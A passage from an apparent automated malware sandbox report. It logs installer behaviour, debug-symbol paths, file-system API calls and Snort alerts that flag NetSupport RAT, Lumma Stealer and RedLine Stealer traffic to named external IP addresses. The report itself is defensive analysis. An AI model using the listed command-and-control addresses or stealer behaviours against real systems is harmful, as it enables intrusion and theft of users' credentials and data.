and personal data. To ensure your safety Digital Pulse comprehends the security implications involved in sharing your IP address and diligently monitors all network traffic. Your IP address will solely be used for authorized business purposes and never for unauthorized ones. Rest assured that none of your personal information will be accessed or collected except for your IP address. This is a strict policy.I &accept the agreementI &do not accept the agreement&NextCancel
                                  Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\ProgramData\regid.1993-06.com.microsoft\msvcr100.dllJump to behavior
                                  Source: unknownHTTPS traffic detected: 172.67.198.151:443 -> 192.168.2.5:49707 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.23.108.224:443 -> 192.168.2.5:49709 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49814 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49844 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50127 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.74.109:443 -> 192.168.2.5:50128 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50131 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.32.100:443 -> 192.168.2.5:50134 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:50141 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50145 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50181 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.12.138:443 -> 192.168.2.5:50188 version: TLS 1.2
                                  Source: ZmWSzgevgt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: wininet.pdb source: a1.exe, 00000014.00000003.2353431592.0000000005933000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2567783357.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, shi4D3B.tmp.33.dr
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: v113.exe, 00000020.00000003.2558249286.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: v113.exe, 00000020.00000003.2558249286.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1402\1402\client32\release_unicode\client32.pdb source: wmiprvse.exe, 0000000E.00000002.4543369015.0000000000402000.00000002.00000001.01000000.00000011.sdmp, wmiprvse.exe, 0000000E.00000000.2226521290.0000000000402000.00000002.00000001.01000000.00000011.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\Prereq.pdbo source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\AICustAct.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, MSIF8B5.tmp.20.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbh source: v113.exe, 00000020.00000000.2555915607.00000000005A8000.00000002.00000001.01000000.00000022.sdmp, v113.exe, 00000020.00000002.2749711024.00000000005A8000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb: source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: v113.exe, 00000020.00000000.2555915607.00000000005A8000.00000002.00000001.01000000.00000022.sdmp, v113.exe, 00000020.00000002.2749711024.00000000005A8000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: msvcr100.i386.pdb source: wmiprvse.exe, 0000000E.00000002.4557171856.000000006F821000.00000020.00000001.01000000.00000015.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\Prereq.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\SoftwareDetector.pdbb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr
                                  Source: Binary string: D:\ReleaseJob\win\Release\bin\x86\embeddeduiproxy.pdb source: a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\lzmaextractor.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\SoftwareDetector.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: wmiprvse.exe, 0000000E.00000002.4558342201.000000006F902000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\Decoder.pdb5 source: a1.exe, 00000014.00000003.2300556158.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: wininet.pdbUGP source: a1.exe, 00000014.00000003.2353431592.0000000005933000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2567783357.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, shi4D3B.tmp.33.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: wmiprvse.exe, 0000000E.00000002.4556884096.000000006BF4E000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: E:\jenkins\workspace\ktop-agent_release_PDFY23FEB_1.0\target\Windows\x64\bin\Release\Setup\ODISSDK.pdb source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.dr
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\DataUploader.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, MSI232D.tmp.21.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\DataUploader.pdb] source: a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, MSI232D.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\Decoder.pdb source: a1.exe, 00000014.00000003.2300556158.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\ShortcutFlags.pdb> source: MSICDCA.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\ShortcutFlags.pdb source: MSICDCA.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\ExternalUi.pdb source: a1.exe, 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmp, a1.exe, 00000014.00000000.2293954187.00000000003CC000.00000002.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\stubs\x86\Updater.pdb source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000000.2464786047.000000000010F000.00000002.00000001.01000000.0000001F.sdmp, Windows Updater.exe, 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmp, Windows Updater.exe, 0000001F.00000000.2490617137.000000000059F000.00000002.00000001.01000000.00000021.sdmp, Windows Updater.exe, 0000001F.00000002.2920934218.000000000059F000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\InstallerAnalytics.pdbz source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbb source: v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: wmiprvse.exe, 0000000E.00000002.4556884096.000000006BF4E000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\aischeduler2.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, MSI80A8.tmp.21.dr, MSI80A7.tmp.21.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: wmiprvse.exe, 0000000E.00000002.4557866506.000000006F8E5000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: E:\jenkins\workspace\ktop-agent_release_PDFY23FEB_1.0\target\Windows\x64\bin\Release\Setup\ODISSDK.pdb~ source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: setup.tmp, 00000004.00000002.4557123919.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4559208924.000000001002F000.00000002.00000001.01000000.00000009.sdmp
                                  Source: Binary string: D:\ReleaseJob\win\Release\custact\x86\InstallerAnalytics.pdb source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.dr
                                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Updater.pdb source: v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: z:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: x:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: v:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: t:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: r:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: p:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: n:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: l:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: j:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: h:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: f:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: b:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: y:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: w:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: u:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: s:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: q:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: o:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: m:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: k:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: i:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: g:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: e:
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile opened: a:
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10003A90 FtpSetCurrentDirectoryW,FtpFindFirstFileW,InternetFindNextFileW,InternetFindNextFileW,InternetCloseHandle,4_2_10003A90
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B6160 FindFirstFileW,GetLastError,FindClose,20_2_002B6160
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002D9090 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CloseHandle,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_002D9090
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CF3C0 FindClose,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,20_2_001CF3C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B5B90 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,20_2_002B5B90
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002D9F30 FindFirstFileW,FindClose,20_2_002D9F30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E2330 FindFirstFileW,FindClose,20_2_002E2330
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F4630 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,20_2_002F4630
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002C2ED0 FindFirstFileW,FindClose,FindClose,20_2_002C2ED0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B5800 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,_wcsrchr,20_2_002B5800
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B7910 FindFirstFileW,FindClose,20_2_002B7910
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0029BD30 FindFirstFileW,FindNextFileW,FindClose,20_2_0029BD30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E1F30 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,20_2_002E1F30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002D5F70 FindFirstFileW,FindClose,20_2_002D5F70
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A5651D0 FindFirstFileW,FindClose,GetLastError,FindClose,20_2_6A5651D0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A55B570 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,20_2_6A55B570
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A583F55 FindFirstFileExW,20_2_6A583F55
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0006D7C0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,28_2_0006D7C0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000EF4F9 FindFirstFileExW,28_2_000EF4F9
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FD7C0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,31_2_004FD7C0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0057F4F9 FindFirstFileExW,31_2_0057F4F9
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E0F00 _wcschr,_wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,20_2_002E0F00

                                  Networking

                                  barindex
                                  Source: TrafficSnort IDS: 2047660 ET MALWARE Win32/TrojanDownloader Variant Activity (GET) 192.168.2.5:49705 -> 104.21.52.223:80
                                  Source: TrafficSnort IDS: 2827745 ETPRO TROJAN NetSupport RAT CnC Activity 192.168.2.5:49718 -> 95.142.47.11:1203
                                  Source: TrafficSnort IDS: 2839343 ETPRO MALWARE InnoDownloadPlugin User-Agent Observed 192.168.2.5:49730 -> 159.223.29.40:80
                                  Source: TrafficSnort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:50126 -> 157.230.96.32:80
                                  Source: TrafficSnort IDS: 2839343 ETPRO MALWARE InnoDownloadPlugin User-Agent Observed 192.168.2.5:50133 -> 37.1.198.251:80
                                  Source: TrafficSnort IDS: 2839343 ETPRO MALWARE InnoDownloadPlugin User-Agent Observed 192.168.2.5:50187 -> 37.1.198.251:80
                                  Source: TrafficSnort IDS: 2855505 ETPRO TROJAN Lumma Stealer Related Activity 192.168.2.5:50196 -> 104.21.83.145:80
                                  Source: TrafficSnort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.5:50196 -> 104.21.83.145:80
                                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.5:50196 -> 104.21.83.145:80
                                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.5:50240 -> 104.21.83.145:80
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50245 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50246 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50247 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50248 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50249 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50250 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50251 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50252 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50253 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50254 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50255 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50256 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50257 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50258 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50259 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50260 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50261 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50262 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50263 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50264 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50265 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50266 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50267 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50268 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50269 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50270 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50271 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50272 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50273 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50274 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50275 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50276 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50277 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50278 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50279 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50280 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50281 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50282 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50283 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50284 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50285 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50286 -> 77.105.136.3:81
                                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.5:50287 -> 77.105.136.3:81
